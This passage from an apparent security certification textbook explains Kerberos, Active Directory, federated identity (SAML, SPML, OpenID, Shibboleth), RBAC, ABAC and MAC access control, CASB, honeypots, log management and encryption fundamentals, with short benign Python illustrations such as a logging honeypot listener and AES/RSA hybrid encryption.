4. The KDC issues a ticket-granting ticket (TGT) to the
principal.
5. The principal sends the TGT to the ticket-granting
service (TGS) when the principal needs to connect
to another entity.
6. The TGS then transmits a ticket and session keys to
the principal. The set of principals for which a single KDC is responsible is referred to as a realm.
Some advantages of implementing Kerberos include the
following:
• User passwords do not need to be sent over the
network.
• Both the client and server authenticate each other.
• The tickets passed between the server and client
are timestamped and include lifetime
information.
• The Kerberos protocol uses open Internet
standards and is not limited to proprietary codes
or authentication mechanisms.
Some disadvantages of implementing Kerberos include
the following:
• KDC redundancy is required if providing fault
tolerance is a requirement. The KDC is a single
point of failure.
• The KDC must be scalable to ensure that
performance of the system does not degrade.
• Session keys on the client machines can be
compromised.
• Kerberos traffic needs to be encrypted to protect
the information over the network.
• All systems participating in the Kerberos process
must have synchronized clocks.
• Kerberos systems are susceptible to password-guessing attacks.
Figure 8-23 shows the Kerberos ticketing process.
Figure 8-23 Kerberos Ticket-Issuing Process
Active Directory
Microsoft’s implementation of SSO is Active Directory
(AD), which organizes directories into forests and trees.
AD tools are used to manage and organize everything in
an organization, including users and devices. This is
where security is implemented, and its implementation
is made more efficient through the use of Group Policy.
AD is an example of a system based on the Lightweight
Directory Access Protocol (LDAP). It uses Kerberos, the same authentication and authorization system used in Unix. This system authenticates a user once and
then, through the use of a ticket system, allows the user
to perform all actions and access all resources to which
she has been given permission without the need to
authenticate again. The steps in this process are shown
in Figure 8-24. The user authenticates with the domain
controller, which is performing several other roles as
well. First, it is the key distribution center (KDC), which runs the authentication service (AS) used to verify the user before she is granted access to a remote service or resource in the network.
Figure 8-24 Kerberos Implementation in Active
Directory
After the user has been authenticated (when she logs on
once to the network), she is issued a ticket-granting
ticket (TGT). This is used to later request session tickets,
which are required to access resources. At any point that
she later attempts to access a service or resource, she is
redirected to the ticket-granting service (TGS) on the KDC. Upon
presenting her TGT, she is issued a session, or service,
ticket for that resource. The user presents the service
ticket, which is signed by the KDC, to the resource server
for access. Because the resource server trusts the KDC,
the user is granted access.
SESAME
The Secure European System for Applications in
a Multivendor Environment (SESAME) project
extended Kerberos’s functionality to fix Kerberos’s
weaknesses. SESAME uses both symmetric and
asymmetric cryptography to protect interchanged data.
SESAME uses a trusted authentication server at each
host. SESAME uses Privileged Attribute Certificates
(PACs) instead of tickets. It incorporates two certificates:
one for authentication and one for defining access
privileges. The trusted authentication server is referred
to as the Privileged Attribute Server (PAS), which
performs roles similar to the KDC in Kerberos. SESAME
can be integrated into a Kerberos system.
Federation
A federated identity is a portable identity that can be
used across businesses and domains. In federated
identity management, each organization that joins the
federation agrees to enforce a common set of policies and
standards. These policies and standards define how to
provision and manage user identification,
authentication, and authorization. Providing disparate
authentication mechanisms with federated IDs has a
lower up-front development cost than other methods,
such as a PKI or attestation. Federated identity
management uses two basic models for linking
organizations within the federation:
• Cross-certification model: In this model, each
organization certifies that every other
organization is trusted. This trust is established
when the organizations review each other’s
standards. Each organization must verify and
certify through due diligence that the other
organizations meet or exceed standards. One
disadvantage of cross-certification is that the
number of trust relationships that must be
managed can become problematic.
• Trusted third-party (or bridge) model: In
this model, each organization subscribes to the
standards of a third party. The third party
manages verification, certification, and due
diligence for all organizations. This is usually the
best model for an organization that needs to
establish federated identity management
relationships with a large number of
organizations.
Security issues with federations and their possible
solutions include the following:
• Inconsistent security among partners:
Federated partners need to establish minimum
standards for the policies, mechanisms, and
practices they use to secure their environments
and information.
• Insufficient legal agreements among
partners: Like any other business partnership,
identity federation requires carefully drafted legal
agreements.
A number of methods are used to securely transmit
authentication data among partners. The following
sections look at these protocols and services.
XACML
Extensible Access Control Markup Language (XACML) is
a standard for an access control policy language using
XML. It is covered in Chapter 7, “Implementing Controls
to Mitigate Attacks and Software Vulnerabilities.”
SPML
Another open standard for exchanging authorization
information between cooperating organizations is
Service Provisioning Markup Language
(SPML). It is an XML-based framework developed by
the Organization for the Advancement of Structured
Information Standards (OASIS), which is a nonprofit,
international consortium that creates interoperable
industry specifications based on public standards such as
XML and SGML. The SPML architecture has three
components:
• Request authority (RA): The entity that makes
the provisioning request
• Provisioning service provider (PSP): The
entity that responds to the RA requests
• Provisioning service target (PST): The entity
that performs the provisioning
When a trust relationship has been established between
two organizations with web-based services, one
organization acts as the RA and the other acts as the PSP.
The trust relationship uses Security Assertion Markup
Language (SAML), discussed next, in a Simple Object
Access Protocol (SOAP) header. The SOAP body
transports the SPML requests/responses.
Figure 8-25 shows an example of how these SPML
messages are used. In the diagram, a company has an
agreement with a supplier to allow the supplier to access
its provisioning system. When the supplier’s HR
department adds a user, an SPML request is generated to
the supplier’s provisioning system so the new user can
use the system. Then the supplier’s provisioning system
generates another SPML request to create the account in
the customer provisioning system.
Figure 8-25 SPML
SAML
Security Assertion Markup Language (SAML) is
a security attestation model built on XML and SOAP-based services that allows for the exchange of
authentication and authorization data between systems
and supports federated identity management. The major
issue it attempts to address is SSO using a web browser.
When authenticating over HTTP using SAML, an
assertion ticket is issued to the authenticating user.
Remember that SSO enables a user to authenticate once
to access multiple sets of data. SSO at the Internet level
is usually accomplished with cookies, but extending the
concept beyond the Internet has resulted in many
proprietary approaches that are not interoperable. The
goal of SAML is to create a standard for this process.
A consortium called the Liberty Alliance proposed an
extension to the SAML standard called the Liberty
Identity Federation Framework (ID-FF), which is
proposed to be a standardized cross-domain SSO
framework. It identifies a circle of trust, within which
each participating domain is trusted to document the
following about each user:
• The process used to identify a user
• The type of authentication system used
• Any policies associated with the resulting
authentication credential
Each member entity is free to examine this information
and determine whether to trust it. Liberty contributed
ID-FF to OASIS. In March 2005, SAML v2.0 was
announced as an OASIS standard. SAML v2.0 represents
the convergence of Liberty ID-FF and other proprietary
extensions.
In an unauthenticated SAMLv2 transaction, the browser
asks the service provider (SP) for a resource. The SP
provides the browser with an XHTML form. The browser asks the identity provider (IP) to validate the user and then provides the XHTML form back to the SP for access. The <nameID> element in SAML can be provided as the X.509 subject name or the Kerberos principal name.
To prevent a third party from identifying a specific user
as having previously accessed a service provider through
an SSO operation, SAML uses transient identifiers
(which are valid only for a single login session and are
different each time the user authenticates again but stay
the same as long as the user is authenticated).
SAML is a good solution in the following scenarios:
• When you need to provide SSO (when at least one
actor or participant is an enterprise)
• When you need to provide access to a partner or
customer application to your portal
• When you can provide a centralized identity
source
OpenID
OpenID is an open standard and decentralized protocol
by the nonprofit OpenID Foundation that allows users to
be authenticated by certain cooperating sites. The
cooperating sites are called relying parties (RPs).
OpenID allows users to log in to multiple sites without
having to register their information repeatedly. Users
select an OpenID identity provider and use those accounts
to log in to any website that accepts OpenID
authentication.
While OpenID solves the same issue as SAML, an
enterprise may find these advantages in using OpenID:
• It’s less complex than SAML.
• It’s been widely adopted by companies such as
Google.
On the other hand, you should be aware of the following
shortcomings of OpenID compared to SAML:
• With OpenID, auto-discovery of the identity
provider must be configured per user.
• SAML has better performance.
SAML can initiate SSO from either the service provider
or the identity provider, while OpenID can only be
initiated from the service provider.
In February 2014, the third generation of OpenID, called
OpenID Connect, was released. It is an authentication
layer protocol that resides atop the OAuth 2.0
framework. It is designed to support native and mobile
applications, and it defines methods of signing and
encryption.
Here is an example of SAML in action:
1. A user logs in to Domain A, using a PKI certificate
that is stored on a smart card protected by an
eight-digit PIN.
2. The credential is cached by the authenticating
server in Domain A.
3. Later, the user attempts to access a resource in
Domain B. This initiates a request to the Domain A
authenticating server to attest to the resource
server in Domain B that the user is in fact who she
claims to be.
Figure 8-26 illustrates the way the service provider
obtains the identity information from the identity
provider.
Figure 8-26 SAML
Shibboleth
Shibboleth is an open source project that provides
single sign-on capabilities and allows sites to make
informed authorization decisions for individual access of
protected online resources in a privacy-preserving
manner. Shibboleth allows the use of common
credentials among sites that are a part of the federation.
It is based on SAML. This system has two components:
• Identity providers: IPs supply the user
information.
• Service providers: SPs consume this
information before providing a service.
Role-Based Access Control
Role-based access control (RBAC) is commonly
used in networks to simplify the process of assigning new
users the permission required to perform a job role. In
this arrangement, users are organized by job role into
security groups, which are then granted the rights and
permissions required to perform that job. Figure 8-27
illustrates this process. The role is implemented as a
security group possessing the required rights and
permissions, which are inherited by all security group or
role members.
Figure 8-27 RBAC
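As a rough illustration of the idea, the following Python sketch maps roles (security groups) to permissions and resolves a user's access through group membership; all role, user, and permission names here are hypothetical:

# Hypothetical role definitions: each role carries the permissions
# required to perform that job.
ROLE_PERMISSIONS = {
    "helpdesk": {"reset_password", "view_tickets"},
    "web_dev": {"deploy_site", "read_logs"},
    "auditor": {"read_logs"},
}

# Users inherit the permissions of every role they are a member of.
USER_ROLES = {
    "alice": {"helpdesk"},
    "bob": {"web_dev", "auditor"},
}

def is_allowed(user: str, permission: str) -> bool:
    return any(
        permission in ROLE_PERMISSIONS.get(role, set())
        for role in USER_ROLES.get(user, set())
    )

print(is_allowed("bob", "read_logs"))      # True
print(is_allowed("alice", "deploy_site"))  # False

Assigning a new hire is then a single group-membership change rather than many individual permission grants, which is the administrative advantage RBAC is designed to deliver.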
This is not a perfect solution, however, and it carries
several security issues. First, RBAC is only as successful
as the organization policies designed to support it. Poor
policies can result in the proliferation of unnecessary
roles, creating an administrative nightmare for the
person managing user access. This can lead to mistakes
that reduce rather than enhance access security.
A related issue is that those managing user access may
have an incomplete understanding of the process, and
this can lead to a serious reduction in security. There can
be additional costs to the organization to ensure proper
training of these individuals. The key to making RBAC
successful is proper alignment with policies and proper
training of those implementing and maintaining the
system.
Note
A security issue can be created when a user is fired or quits. In both cases, all
access should be removed. Account reviews should be performed on a regular
basis to catch any old accounts that are still active.
Attribute-Based Access Control
Attribute-based access control (ABAC) grants or
denies user requests based on arbitrary attributes of the
user and arbitrary attributes of the object, and
environment conditions that may be globally recognized.
NIST SP 800-162 was published to define and clarify
ABAC.
According to NIST SP 800-162, ABAC is an access
control method where subject requests to perform
operations on objects are granted or denied based on
assigned attributes of the subject, assigned attributes of
the object, environment conditions, and a set of policies
that are specified in terms of those attributes and
conditions. An operation is the execution of a function at
the request of a subject upon an object. Operations
include read, write, edit, delete, copy, execute, and
modify. A policy is the representation of rules or
relationships that makes it possible to determine if a
requested access should be allowed, given the values of
the attributes of the subject, object, and possibly
environment conditions. Environment conditions are the
operational or situational context in which access
requests occur. Environment conditions are detectable
environmental characteristics, which are independent of
subject or object, and may include the current time, day
of the week, location of a user, or the current threat level.
Figure 8-28 shows a basic ABAC scenario according to
NIST SP 800-162.
Figure 8-28 NIST SP 800-162 Basic ABAC Scenario
As specified in NIST SP 800-162, there are
characteristics or attributes of a subject such as name,
date of birth, home address, training record, and job
function that may, either individually or when combined,
comprise a unique identity that distinguishes that person
from all others. These characteristics are often called
subject attributes.
Like subjects, each object has a set of attributes that help
describe and identify it. These traits are called object
attributes (sometimes referred to as resource
attributes). Object attributes are typically bound to their
objects through reference, by embedding them within
the object, or through some other means of assured
association such as cryptographic binding.
ACLs and RBAC are in some ways special cases of ABAC
in terms of the attributes used. ACLs work on the
attribute of “identity.” RBAC works on the attribute of
“role.” The key difference with ABAC is the concept of
policies that express a complex Boolean rule set that can
evaluate many different attributes. While it is possible to
achieve ABAC objectives using ACLs or RBAC,
demonstrating access control requirements compliance
is difficult and costly due to the level of abstraction
required between the access control requirements and
the ACL or RBAC model. Another problem with ACL or
RBAC models is that if the access control requirement is
changed, it may be difficult to identify all the places
where the ACL or RBAC implementation needs to be
updated.
ABAC relies upon the assignment of attributes to
subjects and objects, and the development of policy that
contains the access rules. Each object within the system
must be assigned specific object attributes that
characterize the object. Some attributes pertain to the
entire instance of an object, such as the owner. Other
attributes may only apply to parts of the object.
Each subject that uses the system must be assigned
specific attributes. Every object within the system must
have at least one policy that defines the access rules for
the allowable subjects, operations, and environment
conditions to the object. This policy is normally derived
from documented or procedural rules that describe the
business processes and allowable actions within the
organization. The rules that bind subject and object
attributes indirectly specify privileges (i.e., which
subjects can perform which operations on which
objects). Allowable operation rules can be expressed
through many forms of computational language such as
• A Boolean combination of attributes and
conditions that satisfies the authorization for a
specific operation
• A set of relations associating subject and object
attributes and allowable operations
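To make the contrast with ACLs and RBAC concrete, here is a minimal Python sketch of an ABAC policy expressed as a Boolean rule over subject, object, and environment attributes; all attribute names and values are hypothetical:

from datetime import datetime, time

# A policy is a Boolean rule evaluated over the attribute sets.
def policy(subject: dict, obj: dict, env: dict) -> bool:
    return (
        subject["department"] == obj["owning_department"]
        and subject["clearance"] >= obj["sensitivity"]
        and time(8, 0) <= env["time"] <= time(18, 0)  # business hours only
    )

subject = {"name": "sally", "department": "finance", "clearance": 3}
obj = {"name": "q3_report", "owning_department": "finance", "sensitivity": 2}
env = {"time": datetime.now().time()}

print("access granted" if policy(subject, obj, env) else "access denied")

Note that no relationship between sally and q3_report is stored anywhere; the decision falls out of their attributes, which is what lets ABAC scale without enumerating subject-object pairs.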
Once object attributes, subject attributes, and policies
are established, objects can be protected using ABAC.
Access control mechanisms mediate access to the objects
by limiting access to allowable operations by allowable
subjects. The access control mechanism assembles the
policy, subject attributes, and object attributes, then
renders and enforces a decision based on the logic
provided in the policy. Access control mechanisms must
be able to manage the process required to make and
enforce the decision, including determining what policy
to retrieve, which attributes to retrieve in what order,
and where to retrieve attributes. The access control
mechanism must then perform the computation
necessary to render a decision.
The policies that can be implemented in an ABAC model
are limited only to the degree imposed by the
computational language and the richness of the available
attributes. This flexibility enables the greatest breadth of
subjects to access the greatest breadth of objects without
having to specify individual relationships between each
subject and each object.
While ABAC is an enabler of information sharing, the set
of components required to implement ABAC gets more
complex when deployed across an enterprise. At the
enterprise level, the increased scale requires complex
and sometimes independently established management
capabilities necessary to ensure consistent sharing and
use of policies and attributes and the controlled
distribution and employment of access control
mechanisms throughout the enterprise.
Mandatory Access Control
In mandatory access control (MAC), subject
authorization is based on security labels. MAC is often
described as prohibitive because it is based on a security
label system. Under MAC, all that is not expressly
permitted is forbidden. Only administrators can change
the category of a resource.
Because of the importance of security in MAC, labeling is
required. Data classification reflects the data’s
sensitivity. In a MAC system, a clearance is a privilege to
access a class of items that are organized by sensitivity.
Each subject and object is given a security or sensitivity
label. The security labels are hierarchical. For
commercial organizations, the levels of security labels
could be confidential, proprietary, corporate, sensitive,
and public. For government or military institutions, the
levels of security labels could be top secret, secret,
confidential, and unclassified.
In MAC, the system makes access decisions when it
compares a subject’s clearance level with an object’s
security label. MAC access systems operate in different
security modes at various times, based on variables such
as sensitivity of data, the clearance level of the user, and
the actions the user is authorized to take. These security
modes are as follows:
• Dedicated security mode: A system is
operating in dedicated security mode if it employs
a single classification level. In this system, all
users can access all data, but they must sign a
nondisclosure agreement (NDA) and be formally
approved for access on a need-to-know basis.
• System high security mode: In a system
operating in system high security mode, all users
have the same security clearance (as in the
dedicated security mode), but they do not all
possess a need-to-know clearance for all the
information in the system. Consequently,
although a user might have clearance to access an
object, she still might be restricted if she does not
have need-to-know clearance pertaining to the
object.
• Compartmented security mode: In a
compartmented security mode system, all users
must possess the highest security clearance (as in
both dedicated and system high security modes),
but they must also have valid need-to-know
clearance, a signed NDA, and formal approval for
all information to which they have access. The
objective is to ensure that the minimum number
of people possible have access to information at
each level or compartment.
• Multilevel security mode: When a system
allows two or more classification levels of
information to be processed at the same time, it is
said to be operating in multilevel security mode.
Users must have a signed NDA for all the
information in the system and have access to
subsets based on their clearance level and need-to-know and formal access approval. These
systems involve the highest risk because
information is processed at more than one level of
security, even when all system users do not have
appropriate clearances or a need-to-know for all
information processed by the system. This is also
sometimes called controlled security mode.
Manual Review
Users who have been assigned privileged accounts have
been given the right to do things that could cause issues.
Privileged accounts, regardless of the authentication
method or architecture, must be monitored to ensure
that these additional rights are not abused.
While there are products that automate the audit of
privileged accounts, if all else fails a manual review must
be done on a regular basis. This task should not be
placed in the “when we have time” category. There’s
never time.
CLOUD ACCESS SECURITY
BROKER (CASB)
A cloud security broker, or cloud access security
broker (CASB), is a software layer that operates as a
gatekeeper between an organization’s on-premises
network and the provider’s cloud environment. It can
provide many services in this strategic position, as shown
in Figure 8-29. Vendors in the CASB market include McAfee and Netskope.
Figure 8-29 CASB
HONEYPOT
Honeypots are systems that are configured to be
attractive to hackers and lure them into spending time
attacking them while information is gathered about the
attack. In some cases, entire networks called honeynets are configured to be similarly attractive. These types
of approaches should only be undertaken by companies
with the skill to properly deploy and monitor them.
Care should be taken that the honeypots and honeynets
do not provide direct connections to any important
systems. This prevents providing a jumping-off point to
other areas of the network. The ultimate purpose of these
systems is to divert attention from more valuable
resources and to gather as much information about an
attack as possible. A tarpit is a type of honeypot designed
to provide a very slow connection to the hacker so that
the attack can be analyzed.
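As a purely illustrative example, the sketch below is a trivial low-interaction honeypot in Python: it listens on a port, accepts connections, and logs the source address and the first bytes sent. The port number is a hypothetical choice, a production honeypot is far more involved, and such a listener should never be placed where it offers a path to real systems:

import socket
from datetime import datetime, timezone

LISTEN_PORT = 2222  # hypothetical port chosen to imitate an SSH service

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", LISTEN_PORT))
    srv.listen()
    while True:
        conn, addr = srv.accept()
        with conn:
            conn.settimeout(5)
            try:
                data = conn.recv(1024)  # capture the attacker's first bytes
            except socket.timeout:
                data = b""
            stamp = datetime.now(timezone.utc).isoformat()
            print(f"{stamp} connection from {addr[0]}:{addr[1]} sent {data!r}")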
MONITORING AND LOGGING
Monitoring and monitoring tools will be discussed in
much more depth in several subsequent chapters, but it
is important that we talk here about logging and
monitoring in the context of infrastructure management.
Log Management
Typically, system, network, and security administrators
are responsible for managing logging on their systems,
performing regular analysis of their log data,
documenting and reporting the results of their log
management activities, and ensuring that log data is
provided to the log management infrastructure in
accordance with the organization’s policies. In addition,
some of the organization’s security administrators act as
log management infrastructure administrators, with
responsibilities such as the following:
• Contact system-level administrators to get
additional information regarding an event or to
request investigation of a particular event.
• Identify changes needed to system logging
configurations (for example, which entries and
data fields are sent to the centralized log servers,
what log format should be used) and inform
system-level administrators of the necessary
changes.
• Initiate responses to events, including incident
handling and operational problems (for example,
a failure of a log management infrastructure
component).
• Ensure that old log data is archived to removable
media and disposed of properly when it is no
longer needed.
• Cooperate with requests from legal counsel,
auditors, and others.
• Monitor the status of the log management
infrastructure (for example, failures in logging
software or log archival media, failures of local
systems to transfer their log data) and initiate
appropriate responses when problems occur.
• Test and implement upgrades and updates to the
log management infrastructure’s components.
• Maintain the security of the log management
infrastructure.
Organizations should develop policies that clearly define
mandatory requirements and suggested
recommendations for several aspects of log
management, including the following: log generation, log
transmission, log storage and disposal, and log analysis.
Table 8-3 provides examples of logging configuration
settings that an organization can use. The types of values
defined in Table 8-3 should only be applied to the hosts
and host components previously specified by the
organization as ones that must or should be logging
security-related events.
Table 8-3 Examples of Logging Configuration
Settings
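As a small illustration of such settings in practice, the following Python sketch configures local log generation with size-based rotation and retention. The file name, size limit, and retention count are hypothetical values that an organization would set by policy, of the kind Table 8-3 enumerates:

import logging
from logging.handlers import RotatingFileHandler

# Hypothetical policy values: rotate at 10 MB, keep 5 archived logs.
handler = RotatingFileHandler(
    "security.log", maxBytes=10 * 1024 * 1024, backupCount=5
)
handler.setFormatter(
    logging.Formatter("%(asctime)s %(levelname)s %(name)s %(message)s")
)

logger = logging.getLogger("security")
logger.setLevel(logging.INFO)  # record security-relevant events and above
logger.addHandler(handler)

logger.info("user login succeeded")  # example security event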
Audit Reduction Tools
Audit reduction tools are preprocessors designed to
reduce the volume of audit records to facilitate manual
review. They are discussed in Chapter 7.
NIST SP 800-137
According to NIST SP 800-137, information security
continuous monitoring (ISCM) is defined as maintaining
ongoing awareness of information security,
vulnerabilities, and threats to support organizational risk
management decisions. Organizations should take the
following steps to establish, implement, and maintain
ISCM:
1. Define an ISCM strategy based on risk tolerance
that maintains clear visibility into assets,
awareness of vulnerabilities, up-to-date threat
information, and mission/business impacts.
2. Establish an ISCM program that includes metrics,
status monitoring frequencies, control assessment
frequencies, and an ISCM technical architecture.
3. Implement an ISCM program and collect the
security-related information required for metrics,
assessments, and reporting. Automate collection,
analysis, and reporting of data where possible.
4. Analyze the data collected, report findings, and
determine the appropriate responses. It may be
necessary to collect additional information to
clarify or supplement existing monitoring data.
5. Respond to findings with technical, management,
and operational mitigating activities or acceptance,
transference/sharing, or avoidance/rejection.
6. Review and update the monitoring program,
adjusting the ISCM strategy and maturing
measurement capabilities to increase visibility into
assets and awareness of vulnerabilities, further
enable data-driven control of the security of an
organization’s information infrastructure, and
increase organizational resilience.
ENCRYPTION
Protecting information with cryptography involves the
deployment of a cryptosystem. A cryptosystem consists
of software, protocols, algorithms, and keys. The
strength of any cryptosystem comes from the algorithm
and the length and secrecy of the key. For example, one
method of making a cryptographic key more resistant to
exhaustive attacks is to increase the key length. If the
cryptosystem uses a weak key, it facilitates attacks
against the algorithm.
While a cryptosystem supports the three core principles of the confidentiality, integrity, and availability (CIA) triad, cryptosystems directly provide authentication, confidentiality, integrity, authorization, and non-repudiation. Cryptography supports the availability tenet only indirectly: it helps protect an organization's data, but it does not by itself ensure that the data remains available. Security services provided by cryptosystems include the following:
• Authentication: Cryptosystems provide
authentication by being able to determine the
sender’s identity and validity. Digital signatures
verify the sender’s identity. Protecting the key
ensures that only valid users can properly encrypt
and decrypt the message.
• Confidentiality: Cryptosystems provide
confidentiality by altering the original data in such
a way as to ensure that the data cannot be read
except by the valid recipient. Without the proper
key, unauthorized users are unable to read the
message.
• Integrity: Cryptosystems provide integrity by
allowing valid recipients to verify that data has not
been altered. Hash functions do not prevent data
alteration but provide a means to determine
whether data alteration has occurred.
• Authorization: Cryptosystems provide
authorization by providing the key to a valid user
after that user proves his identity through
authentication. The key given to the user allows
the user to access a resource.
• Non-repudiation: Non-repudiation in
cryptosystems provides proof of the origin of data,
thereby preventing the sender from denying that
he sent the message and supporting data integrity.
Public key cryptography and digital signatures
provide non-repudiation.
• Key management: Key management in
cryptography is essential to ensure that the
cryptography provides confidentiality, integrity,
and authentication. If a key is compromised, it
can have serious consequences throughout an
organization.
Cryptographic Types
Algorithms that are used in computer systems
implement complex mathematical formulas when
converting plaintext to ciphertext. The two main
components to any encryption system are the key and
the algorithm. In some encryption systems, the two
communicating parties use the same key. In other
encryption systems, the two communicating parties use
different keys in the process, but the keys are related.
This section discusses symmetric algorithms and
asymmetric algorithms.
Symmetric Algorithms
Symmetric algorithms use a private or secret key
that must remain secret between the two parties. Each
party pair requires a separate private key. Therefore, a
single user would need a unique secret key for every user
with whom she communicates.
Consider an example where there are 10 unique users.
Each user needs a separate private key to communicate
with the other users. To calculate the number of keys
that would be needed in this example, you would use the
following formula:
number of users × (number of users – 1) / 2
Therefore, in this example, you would calculate 10 × (10
– 1) / 2 = 45 needed keys.
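A quick sketch of this calculation in Python shows how fast the key count grows, which is the scalability weakness of symmetric systems:

def symmetric_keys_needed(users: int) -> int:
    # Each unique pair of users needs its own secret key.
    return users * (users - 1) // 2

print(symmetric_keys_needed(10))   # 45
print(symmetric_keys_needed(100))  # 4950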
With symmetric algorithms, the encryption key must
remain secure. To obtain the secret key, the users must
find a secure out-of-band method for communicating the
secret key, including courier or direct physical contact
between the users. A special type of symmetric key called
a session key encrypts messages between two users
during one communication session. Symmetric
algorithms can be referred to as single-key, secret-key,
private-key, or shared-key cryptography. Symmetric
systems provide confidentiality but not authentication or
non-repudiation. If both users use the same key,
determining where the message originated is impossible.
Symmetric algorithms include AES, IDEA, Blowfish,
Twofish, RC4/RC5/RC6, and CAST. Table 8-4 lists the
strengths and weaknesses of symmetric algorithms.
Table 8-4 Symmetric Algorithm Strengths and
Weaknesses
The two broad types of symmetric algorithms are
stream-based ciphers and block ciphers. Initialization
vectors (IVs) are an important part of block ciphers.
These three components are discussed next.
Stream-based Ciphers
Stream-based ciphers perform encryption on a bit-by-bit basis and use keystream generators. The
keystream generators create a bit stream that is XORed
with the plaintext bits. The result of this XOR operation
is the ciphertext.
A synchronous stream-based cipher depends only on the
key, and an asynchronous stream cipher depends on the
key and plaintext. The key ensures that the bit stream
that is XORed to the plaintext is random.
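The XOR mechanics can be shown in a few lines of Python. The toy keystream below (derived by hashing a key with a counter) is for illustration only and is not a secure cipher:

import hashlib
from itertools import count

def keystream(key: bytes):
    # Toy keystream generator: hash the key with a block counter.
    for block in count():
        yield from hashlib.sha256(key + block.to_bytes(8, "big")).digest()

def xor_cipher(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ k for b, k in zip(data, keystream(key)))

key = b"demo key"
ciphertext = xor_cipher(b"attack at dawn", key)
print(xor_cipher(ciphertext, key))  # b'attack at dawn'

Because XOR is its own inverse, running the same operation with the same key decrypts the message, which is why stream ciphers use one key for both directions.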
Advantages of stream-based ciphers include the
following:
• They generally have lower error propagation
because encryption occurs on each bit.
• They are generally used more in hardware
implementations.
• They use the same key for encryption and
decryption.
• They are generally cheaper to implement than
block ciphers.
Block Ciphers
Block ciphers perform encryption by breaking the
message into fixed-length units. A message of 1024 bits
could be divided into 16 blocks of 64 bits each. Each of
those 16 blocks is processed by the algorithm formulas,
resulting in a single block of ciphertext. Examples of
block ciphers include IDEA, Blowfish, RC5, and RC6.
Advantages of block ciphers include the following:
• Implementation of block ciphers is easier than
stream-based cipher implementation.
• They are generally less susceptible to security
issues.
• They are generally used more in software
implementations.
Table 8-5 lists the key facts about each symmetric
algorithm.
Table 8-5 Symmetric Algorithms Key Facts
The block ciphers mentioned earlier use initialization
vectors (IVs) to ensure that patterns are not produced
during encryption. These IVs provide this service by
using random values with the algorithms. Without using
IVs, a repeated phrase within a plaintext message could
result in the same ciphertext. Attackers can possibly use
these patterns to break the encryption.
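The effect is easy to demonstrate. This sketch assumes the third-party pyca/cryptography package; encrypting the same plaintext block twice under fresh random IVs yields different ciphertext:

import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(32)              # 256-bit AES key
plaintext = b"ATTACK AT DAWN!!"   # exactly one 16-byte block, so no padding

def encrypt_cbc(data: bytes) -> bytes:
    iv = os.urandom(16)  # fresh random IV for every message
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return iv + enc.update(data) + enc.finalize()

# Same key, same plaintext, different IVs -> different ciphertext.
print(encrypt_cbc(plaintext).hex())
print(encrypt_cbc(plaintext).hex())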
Asymmetric Algorithms
Asymmetric algorithms use both a public key and a
private or secret key. The public key is known by all
parties, and the private key is known only by its owner.
One of these keys encrypts the message, and the other
decrypts the message. (Asymmetric algorithms are also
referred to as dual-key or public-key cryptography.)
In asymmetric cryptography, determining a user’s
private key is virtually impossible even if the public key
is known, although both keys are mathematically related.
However, if a user’s private key is discovered, the system
can be compromised.
Asymmetric systems provide confidentiality, integrity,
authentication, and non-repudiation. Because both users
have one unique key that is part of the process,
determining where the message originated is possible. If
confidentiality is the primary concern for an
organization, a message should be encrypted with the
receiver’s public key, which is referred to as secure
message format. If authentication is the primary
concern for an organization, a message should be
encrypted with the sender’s private key, which is referred
to as open message format. When using open message
format, the message can be decrypted by anyone with the
public key.
Asymmetric algorithms include Diffie-Hellman, RSA, El
Gamal, ECC, Knapsack, DSA, and Zero Knowledge Proof.
Table 8-6 lists the strengths and weaknesses of
asymmetric algorithms.
Table 8-6 Asymmetric Algorithm Strengths and
Weaknesses
Hybrid Encryption
Because both symmetric and asymmetric algorithms
have weaknesses, solutions have been developed that use
both types of algorithms in a hybrid cipher. By using
both algorithm types, the cipher provides confidentiality,
authentication, and non-repudiation.
The process for hybrid encryption is as follows:
1. The symmetric algorithm provides the keys used for
encryption.
2. The symmetric keys are passed to the asymmetric
algorithm, which encrypts the symmetric keys and
automatically distributes them.
3. The message is encrypted with the symmetric key.
4. Both the message and the key are sent to the
receiver.
5. The receiver decrypts the symmetric key and uses
the symmetric key to decrypt the message.
An organization should use hybrid encryption if the
parties do not have a shared secret key and large
quantities of sensitive data must be transmitted.
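A minimal sketch of the pattern, again assuming the pyca/cryptography package: a fresh AES session key protects the bulk message, and the recipient's RSA public key protects the session key. This is one common way to realize the steps above, not the only one:

import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# Recipient's key pair (the public half would normally come from a certificate).
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

# Encrypt the message with a fresh symmetric session key,
# then wrap that key with the recipient's public key.
session_key = AESGCM.generate_key(bit_length=256)
nonce = os.urandom(12)
ciphertext = AESGCM(session_key).encrypt(nonce, b"large sensitive payload", None)
oaep = padding.OAEP(
    mgf=padding.MGF1(algorithm=hashes.SHA256()),
    algorithm=hashes.SHA256(),
    label=None,
)
wrapped_key = public_key.encrypt(session_key, oaep)

# The receiver unwraps the session key and decrypts the message.
recovered_key = private_key.decrypt(wrapped_key, oaep)
print(AESGCM(recovered_key).decrypt(nonce, ciphertext, None))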
Integrity is one of the three basic tenets of security.
Message integrity ensures that a message has not been
altered by using parity bits, cyclic redundancy checks
(CRCs), or checksums.
The parity bit method adds an extra bit to the data. This
parity bit simply indicates if the number of 1 bits is odd
or even. The parity bit is 1 if the number of 1 bits is odd,
and the parity bit is 0 if the number of 1 bits is even. The
parity bit is set before the data is transmitted. When the
data arrives, the parity bit is checked against the other
data. If the parity bit doesn’t match the data sent, then
an error is sent to the originator.
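A sketch of this parity computation in Python:

def parity_bit(data: bytes) -> int:
    # Return 1 if the number of 1 bits is odd, 0 if it is even.
    ones = sum(bin(byte).count("1") for byte in data)
    return ones % 2

message = b"\x2a"           # 00101010 -> three 1 bits
print(parity_bit(message))  # 1, because the count of 1 bits is odd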
The CRC method uses polynomial division to determine
the CRC value for a file. The CRC value is usually 16 or 32
bits long. Because CRC is very sensitive to changes, the CRC values will not match if even a single bit is incorrect.
The checksum method adds up the bytes of data being
sent and then transmits that number to be checked later
